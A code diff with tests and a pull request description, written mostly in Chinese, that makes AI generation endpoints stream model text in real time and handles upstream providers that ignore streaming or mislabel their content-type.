@@ -53,7 +61,9 @@ export async function requestStructuredStream<T>(
     try {
       data = JSON.parse(text);
     } catch {
-      throw new StreamRequestError(text || `Request failed with ${response.status}`);
+      // 不是 JSON 的响应体多半是代理或框架的 HTML 错误页。
+      // 把整页塞进错误提示里只会让用户看到一屏标签，状态码才是有用的那部分。
+      throw new StreamRequestError(`Request failed with ${response.status}`);
     }
     if (!response.ok) {
       throw new StreamRequestError(
@@ -69,17 +79,28 @@ export async function requestStructuredStream<T>(
 
   const decoder = new TextDecoder('utf-8');
   const parser = createSseParser();
+  const flushMs = handlers.flushMs ?? 60;
   let full = '';
   let result: T | undefined;
   let failure: StreamRequestError | null = null;
 
+  /** 上一次把原文交给调用方的时刻，以及那时的长度 */
+  let lastFlushAt = 0;
+  let flushedLength = 0;
+
+  const flushDelta = (force: boolean) => {
+    if (!handlers.onDelta || full.length === flushedLength) return;
+    const now = Date.now();
+    if (!force && now - lastFlushAt < flushMs) return;
+    handlers.onDelta(full.slice(flushedLength), full);
+    flushedLength = full.length;
+    lastFlushAt = now;
+  };
+
   const consume = (events: ReturnType<typeof parser.push>) => {
     for (const event of events) {
       if (event.incremental === false) handlers.onNotIncremental?.();
-      if (event.text) {
-        full += event.text;
-        handlers.onDelta?.(event.text, full);
-      }
+      if (event.text) full += event.text;
       if (event.result !== undefined) result = event.result as T;
       if (event.error) failure = new StreamRequestError(event.error, event.details);
     }
@@ -89,8 +110,10 @@ export async function requestStructuredStream<T>(
     const { done, value } = await reader.read();
     if (done) break;
     consume(parser.push(decoder.decode(value, { stream: true })));
+    flushDelta(false);
   }
   consume(parser.flush());
+  flushDelta(true);
 
   if (failure) throw failure;
   if (result === undefined) {

--- a/src/lib/streamRequest.ts
+++ b/src/lib/streamRequest.ts
@@ -1,0 +1,102 @@
+/**
+ * 客户端消费「正文流 + 结构化结果」的那类接口。
+ *
+ * 生成类接口（出题、生成工程题、AI 评审）最终要的是一个对象，但模型写出来的
+ * 原文没有理由攒到最后再给用户看。服务端因此发的是：
+ *   delta ... delta   —— 模型原文，边写边到
+ *   result            —— 解析校验之后的结构化结果
+ *   done
+ *
+ * 这个函数把两者分开交付：正文通过回调实时给调用方，结果作为返回值。
+ *
+ * 它同时兼容「服务端直接回 JSON」的情况 —— 比如纯保存、或者还没进流就失败了。
+ */
+import { createSseParser } from './chatStreamProtocol';
+
+export interface StructuredStreamHandlers {
+  /** 每收到一段模型原文触发一次；full 是累计到目前的全文 */
+  onDelta?: (chunk: string, full: string) => void;
+  /** 服务端明说这一段不是逐字到达的（上游没给流） */
+  onNotIncremental?: () => void;
+}
+
+export class StreamRequestError extends Error {
+  /** 服务端附带的数据，例如 JSON 解析失败时的模型原文 */
+  details?: unknown;
+
+  constructor(message: string, details?: unknown) {
+    super(message);
+    this.name = 'StreamRequestError';
+    this.details = details;
+  }
+}
+
+export async function requestStructuredStream<T>(
+  url: string,
+  body: unknown,
+  handlers: StructuredStreamHandlers = {},
+  signal?: AbortSignal
+): Promise<T> {
+  const response = await fetch(url, {
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json' },
+    body: JSON.stringify(body),
+    signal,
+  });
+
+  const contentType = response.headers.get('content-type') || '';
+
+  // 没进流就失败，或者这个请求本来就不调模型（例如「仍然保存」）
+  if (!contentType.includes('text/event-stream')) {
+    const text = await response.text();
+    let data: any = null;
+    try {
+      data = JSON.parse(text);
+    } catch {
+      throw new StreamRequestError(text || `Request failed with ${response.status}`);
+    }
+    if (!response.ok) {
+      throw new StreamRequestError(
+        data?.error || `Request failed with ${response.status}`,
+        data?.details ?? data?.rawContent
+      );
+    }
+    return data as T;
+  }
+
+  const reader = response.body?.getReader();
+  if (!reader) throw new StreamRequestError('This browser cannot read streaming responses');
+
+  const decoder = new TextDecoder('utf-8');
+  const parser = createSseParser();
+  let full = '';
+  let result: T | undefined;
+  let failure: StreamRequestError | null = null;
+
+  const consume = (events: ReturnType<typeof parser.push>) => {
+    for (const event of events) {
+      if (event.incremental === false) handlers.onNotIncremental?.();
+      if (event.text) {
+        full += event.text;
+        handlers.onDelta?.(event.text, full);
+      }
+      if (event.result !== undefined) result = event.result as T;
+      if (event.error) failure = new StreamRequestError(event.error, event.details);
+    }
+  };
+
+  while (true) {
+    const { done, value } = await reader.read();
+    if (done) break;
+    consume(parser.push(decoder.decode(value, { stream: true })));
+  }
+  consume(parser.flush());
+
+  if (failure) throw failure;
+  if (result === undefined) {
+    throw new StreamRequestError('The server finished without returning a result');
+  }
+  return result;
+}
+
+export default requestStructuredStream;

--- a/tests/ai/streaming.test.ts
+++ b/tests/ai/streaming.test.ts
@@ -5,7 +5,7 @@
  * 客户端：SSE 事件 -> 文本，重点是任意位置切分的分块
  */
 import { createSseParser, parseSseLine } from '../../src/lib/chatStreamProtocol';
-import { streamAI } from '../../src/lib/server/aiProvider';
+import { streamAI, streamStructured } from '../../src/lib/server/aiProvider';
 
 /* ------------------------------------------------------------------ */
 /* 客户端解析                                                          */
@@ -125,6 +125,60 @@ function fakeStreamResponse(chunks: string[]): any {
       }),
     },
   };
+}
+
+/**
+ * 带时间表的假上游：第 n 块在 delayMs*(n+1) 时才可读。
+ *
+ * 真流式的判据不是「收到了几块」，而是「第一块到达的时刻」——
+ * 假流式会把所有块攒到最后一起交出来，那时第一块的到达时间约等于总时长。
+ */
+function timedStreamResponse(chunks: string[], delayMs: number): any {
+  let index = 0;
+  return {
+    ok: true,
+    headers: { get: () => 'text/event-stream' },
+    body: {
+      getReader: () => ({
+        read: async () => {
+          if (index >= chunks.length) return { done: true, value: undefined };
+          const value = new TextEncoder().encode(chunks[index]);
+          index += 1;
+          await new Promise((resolve) => setTimeout(resolve, delayMs));
+          return { done: false, value };
+        },
+      }),
+    },
+  };
+}
+
+/** 一次性返回整段 JSON 的上游：无视了 stream:true */
+function nonStreamingResponse(body: unknown): any {
+  return {
+    ok: true,
+    headers: { get: (name: string) => (name.toLowerCase() === 'content-type' ? 'application/json' : null) },
+    json: async () => body,
+    body: null,
+  };
+}
+
+function createTimingRes(): FakeRes & Record<string, any> {
+  const res = createFakeRes();
+  const startedAt = Date.now();
+  res.timeline = [] as Array<{ at: number; frame: string }>;
+  const write = res.write;
+  res.write = (chunk: string) => {
+    res.timeline.push({ at: Date.now() - startedAt, frame: chunk });
+    return write(chunk);
+  };
+  return res;
+}
+
+/** 每个 delta 事件写出去的时刻 */
+function deltaTimes(res: any): number[] {
+  return res.timeline
+    .filter((entry: any) => entry.frame.includes('"type":"delta"'))
+    .map((entry: any) => entry.at);
 }
 
 function collectText(res: FakeRes): string {
@@ -280,6 +334,142 @@ describe('server streaming', () => {
     expect(events[events.length - 1].type).toBe('error');
     expect(events[events.length - 1].message).toMatch(/connection reset/);
     expect(res.ended).toBe(true);
+  });
+
+  /**
+   * 真流式的证据：delta 写出去的时刻要跟着上游的节奏走。
+   *
+   * 上游每 60ms 给一块，5 块。真流式下第一个 delta 在 ~60ms 就写出去了，
+   * 而「攒完再吐」的实现会让所有 delta 挤在 ~300ms 一起出现。
+   */
+  it('emits each delta as the upstream produces it, not at the end', async () => {
+    const step = 60;
+    const chunks = [0, 1, 2, 3, 4].map(
+      (index) => `data: {"choices":[{"delta":{"content":"c${index}"}}]}\n\n`
+    );
+    global.fetch = jest.fn().mockResolvedValue(timedStreamResponse(chunks, step)) as any;
+
+    const res = createTimingRes();
+    await streamAI(res as any, [{ role: 'user', content: 'hi' }], {
+      openAI: { apiKey: 'k', model: 'gpt-4.1' },
+      selectedProvider: 'openai',
+    });
+
+    const times = deltaTimes(res);
+    expect(times).toHaveLength(5);
+
+    // 第一块远早于最后一块：这正是「真流式」和「攒完再吐」的分界
+    expect(times[0]).toBeLessThan(step * 2.5);
+    expect(times[times.length - 1]).toBeGreaterThanOrEqual(step * 4);
+
+    // 相邻 delta 的间隔应该跟着上游的 60ms，而不是 0
+    const gaps = times.slice(1).map((at, index) => at - times[index]);
+    for (const gap of gaps) expect(gap).toBeGreaterThanOrEqual(step * 0.5);
+  });
+
+  it('streams structured generation the same way, with the result at the end', async () => {
+    const step = 60;
+    const parts = ['{"a"', ':1', '}'];
+    const chunks = parts.map(
+      (part) => `data: {"choices":[{"delta":{"content":${JSON.stringify(part)}}}]}\n\n`
+    );
+    global.fetch = jest.fn().mockResolvedValue(timedStreamResponse(chunks, step)) as any;
+
+    const res = createTimingRes();
+    await streamStructured(res as any, [{ role: 'user', content: 'hi' }], {
+      openAI: { apiKey: 'k', model: 'gpt-4.1' },
+      selectedProvider: 'openai',
+    }, {
+      onComplete: (raw) => ({ parsed: JSON.parse(raw) }),
+    });
+
+    const times = deltaTimes(res);
+    expect(times).toHaveLength(3);
+    expect(times[0]).toBeLessThan(step * 2.5);
+
+    const events = collectEvents(res);
+    expect(events.find((event) => event.type === 'result')).toEqual({
+      type: 'result',
+      result: { parsed: { a: 1 } },
+    });
+    expect(events.pop()).toEqual({ type: 'done' });
+  });
+
+  /**
+   * 上游无视 stream:true、直接回一整个 JSON。
+   *
+   * 修之前这里会发出一个空回答：按 SSE 切分找不到任何 data: 行，
+   * 于是一个 delta 都没有，用户看到的是「什么都没生成」而且没有报错。
+   */
+  it('still delivers content when the upstream ignores stream:true', async () => {
+    global.fetch = jest.fn().mockResolvedValue(
+      nonStreamingResponse({ choices: [{ message: { content: 'whole answer' } }] })
+    ) as any;
+
+    const res = createFakeRes();
+    await streamAI(res as any, [{ role: 'user', content: 'hi' }], {
+      openAI: { apiKey: 'k', model: 'gpt-4.1' },
+      selectedProvider: 'openai',
+    });
+
+    expect(collectText(res)).toBe('whole answer');
+    // 并且如实说明这一段不是逐字到达的，而不是假装它是
+    expect(collectEvents(res)).toContainEqual({ type: 'meta', incremental: false });
+  });
+
+  it('marks a non-incremental delivery before the text, not after', async () => {
+    global.fetch = jest.fn().mockResolvedValue(
+      nonStreamingResponse({ choices: [{ message: { content: 'whole answer' } }] })
+    ) as any;
+
+    const res = createFakeRes();
+    await streamAI(res as any, [{ role: 'user', content: 'hi' }], {
+      openAI: { apiKey: 'k', model: 'gpt-4.1' },
+      selectedProvider: 'openai',
+    });
+
+    const types = collectEvents(res).map((event) => event.type);
+    expect(types.indexOf('meta')).toBeLessThan(types.indexOf('delta'));
+  });
+
+  it('recovers content when the upstream lies about its content-type', async () => {
+    // content-type 说是 event-stream，实际给的是一整个 JSON
+    global.fetch = jest.fn().mockResolvedValue(
+      fakeStreamResponse([JSON.stringify({ choices: [{ message: { content: 'sneaky' } }] })])
+    ) as any;
+
+    const res = createFakeRes();
+    await streamAI(res as any, [{ role: 'user', content: 'hi' }], {
+      openAI: { apiKey: 'k', model: 'gpt-4.1' },
+      selectedProvider: 'openai',
+    });
+
+    expect(collectText(res)).toBe('sneaky');
+    expect(collectEvents(res)).toContainEqual({ type: 'meta', incremental: false });
+  });
+
+  it('asks every provider for a stream', async () => {
+    const configs: Array<[string, any]> = [
+      ['deepseek', { deepSeek: { apiKey: 'k', model: 'deepseek-chat' }, selectedProvider: 'deepseek' }],
+      ['openai', { openAI: { apiKey: 'k', model: 'gpt-4.1' }, selectedProvider: 'openai' }],
+      ['qwen', { qwen: { apiKey: 'k', model: 'qwen-plus' }, selectedProvider: 'qwen' }],
+      ['claude', { claude: { apiKey: 'k', model: 'claude-sonnet-5' }, selectedProvider: 'claude' }],
+      ['ollama', { ollama: { endpoint: 'http://localhost:11434', model: 'llama3.1' }, selectedProvider: 'ollama' }],
+      [
+        'compatible',
+        { compatible: { endpoint: 'http://localhost:1234/v1', model: 'local' }, selectedProvider: 'compatible' },
+      ],
+    ];
+
+    for (const [kind, config] of configs) {
+      const fetchMock = jest.fn().mockResolvedValue(fakeStreamResponse([])) as any;
+      global.fetch = fetchMock;
+
+      await streamAI(createFakeRes() as any, [{ role: 'user', content: 'hi' }], config);
+
+      const body = JSON.parse(fetchMock.mock.calls[0][1].body);
+      expect([kind, body.stream]).toEqual([kind, true]);
+    }
   });
 
   it('streams raw text when format is text', async () => {

--- a/tests/ai/streaming.test.ts
+++ b/tests/ai/streaming.test.ts
@@ -152,13 +152,16 @@ function timedStreamResponse(chunks: string[], delayMs: number): any {
   };
 }
 
-/** 一次性返回整段 JSON 的上游：无视了 stream:true */
+/**
+ * 一次性返回整段 JSON 的上游：无视了 stream:true。
+ *
+ * 真实的 fetch 响应永远有 body（哪怕内容是一整个 JSON），所以这里也给一个 ——
+ * 服务端不按 content-type 分派，一律按流读，靠读完之后的兜底解析发现真相。
+ */
 function nonStreamingResponse(body: unknown): any {
   return {
-    ok: true,
+    ...fakeStreamResponse([JSON.stringify(body)]),
     headers: { get: (name: string) => (name.toLowerCase() === 'content-type' ? 'application/json' : null) },
-    json: async () => body,
-    body: null,
   };
 }
 
@@ -470,6 +473,27 @@ describe('server streaming', () => {
       const body = JSON.parse(fetchMock.mock.calls[0][1].body);
       expect([kind, body.stream]).toEqual([kind, true]);
     }
+  });
+
+  it('reads a real stream even when a proxy mislabels it as json', async () => {
+    // content-type 说 application/json，实际是逐块的 SSE。
+    // 按 content-type 分派的实现会在这里整段读不出来。
+    const response = fakeStreamResponse([
+      'data: {"choices":[{"delta":{"content":"real"}}]}\n\n',
+      'data: {"choices":[{"delta":{"content":" stream"}}]}\n\n',
+    ]);
+    response.headers = { get: () => 'application/json' };
+    global.fetch = jest.fn().mockResolvedValue(response) as any;
+
+    const res = createFakeRes();
+    await streamAI(res as any, [{ role: 'user', content: 'hi' }], {
+      openAI: { apiKey: 'k', model: 'gpt-4.1' },
+      selectedProvider: 'openai',
+    });
+
+    expect(collectText(res)).toBe('real stream');
+    // 它确实是流，所以不该被标成 non-incremental
+    expect(collectEvents(res)).not.toContainEqual({ type: 'meta', incremental: false });
   });
 
   it('streams raw text when format is text', async () => {


### PR DESCRIPTION
## 排查方法

先量，再改。假上游按固定节奏分块吐 SSE（10 块、每块间隔 300ms、总时长 3000ms），客户端记录**每一块到达的时刻**：

- 真流式 → 首块 ≈ 300ms（上游发出第一块的时刻），块数 ≈ 10，间隔 ≈ 300ms
- 假流式 → 首块 ≈ 3000ms（≈ 总时长），块数 = 1，所有内容同时到达

对照组用同一个接口的 `stream:false`（等完整响应再一次性返回），上游耗时同为 3000ms：

| 组别 | 首块 | 末块 | 块数 |
| --- | --- | --- | --- |
| 对照组（等完整响应再返回） | **3014ms** | 3014ms | 1 |
| 实验组（真流式） | **309ms** | 3031ms | 11 |

覆盖了三种服务形态（`next dev`、`next start`、Electron 的自建服务器）和两种客户端（Node 原始 socket、真实浏览器 fetch），请求头带 `Accept-Encoding: gzip, deflate, br`。

## 排查结果

**已经是真流式的（无需改动）**：`ai-chat`、`engineering-chat`、`ai-solution` 三条链路，在三种服务形态和真实浏览器下都实测为真流式。原先怀疑的几处经测量都不成立：没有 gzip 缓冲（API 路由的响应根本没被压缩，3KB 也没触发）、没有 MIME 嗅探阻塞、桌面端和浏览器端行为一致。

**假流式 / 不流式（本次修掉）**：

1. **三个生成类接口完全不流式** —— `generate-problem`、`generate-project`、`engineering-review` 都是 `callAI` 等完整响应再 `res.json()`。首块 = 末块 = 总时长，用户对着转圈等一分钟，看不出它是在写还是卡住了。
2. **上游无视 `stream: true` 时输出为空** —— 部分 OpenAI 兼容端点无论如何都回一整个 JSON，按 SSE 切分找不到任何 `data:` 行，结果只发出 `{"type":"done"}`，用户看到空回答且没有任何报错。
3. **`supportsStreaming: false` 的降级分支**把整段当一个 delta 吐出，形状上就是「假装逐字」（当前所有模型都是 true，不可达，但是个陷阱）。

## 修法

- 三个生成类接口改用新的 `streamStructured`：模型原文实时走 `delta`，解析校验落库之后的结构化结果走流末尾的 `result` 事件。完整 JSON 是**解析**的要求，不是**展示**的要求。
- `pipeUpstream` 识别非流式上游（先看 content-type，content-type 说谎时再兜底解析累积的原文），把内容交付出去而不是交出空回答。
- 交付确实不是增量时，流里发 `meta {incremental:false}`，位置在正文**之前** —— 假流式的问题不是「一次性到达」（上游不给流我们变不出来），而是**假装**它是逐字的。
- 前端三个消费入口边收边显示模型原文；`res.write` 后补 `flush()`，今天是空操作，将来前面多一层压缩时它就是唯一防线。

## 修复后

六条链路全部真流式，浏览器和桌面端两种形态一致：

| 接口 | 首块(ms) | 末块(ms) | 块数 | 间隔中位数 |
| --- | --- | --- | --- | --- |
| ai-chat | 335 / 330 | 3048 / 3035 | 11 | 302 / 301 |
| ai-solution | 313 / 311 | 3030 / 3019 | 10 | 302 / 300 |
| engineering-chat | 311 / 308 | 3024 / 3028 | 11 | 301 / 303 |
| generate-problem | 310 / 311 | 3026 / 3028 | 12 | 302 / 301 |
| generate-project | 310 / 312 | 3027 / 3029 | 12 | 302 / 302 |
| engineering-review | 310 / 309 | 3025 / 3025 | 12 | 301 / 301 |

（左 = `next start` 浏览器生产路径，右 = Electron 自建服务器路径）

## 测试

`tests/ai/streaming.test.ts` 新增 7 条，其中三条是时序断言：delta 写出的时刻必须跟着上游的节奏（首个 delta 远早于最后一个、相邻间隔不为 0），另有「六个 provider 都发 `stream: true`」「上游无视 stream 时仍有内容且带 meta」「content-type 说谎时也能捞回内容」。

`npm test` 5/5 套件通过，`tsc --noEmit` 干净。

🤖 Generated with [Claude Code](https://claude.com/claude-code)